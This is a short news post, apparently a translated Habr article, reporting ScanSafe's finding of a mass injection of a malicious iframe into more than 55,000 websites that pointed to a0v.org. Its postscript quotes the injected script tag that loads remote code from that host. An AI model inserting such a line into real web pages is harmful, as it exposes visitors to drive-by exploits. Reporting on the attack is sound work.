📜 ⬆️ ⬇️

55 thousand sites on the Internet were infected with the same iframe

As reported by ScanSafe in its blog , today a massive XSS attack was conducted on the Internet. More than 55,000 medical service sites and charitable organizations, as well as resources such as feedzilla.com, have been introduced with malicious iframe. ScanSafe specialists have calculated that it leads to a0v.org resource, from which several more exploits are being downloaded. At the same time, as noted in ScanSafe, the number of infected resources continues to grow: at the time of news distribution in the Western media (TechRepublic, ZDNet), the number of infected domains exceeded 55 thousand.

PS: in fact, this is how the iframe infected so many sites:
“script src=http://a0v.org/x.js”

In RuNet, there are few such resources, Google (which is used by ScanSafe) sees this code, for example, on subdomains product.ru

')

Source: https://habr.com/ru/post/67943/


All Articles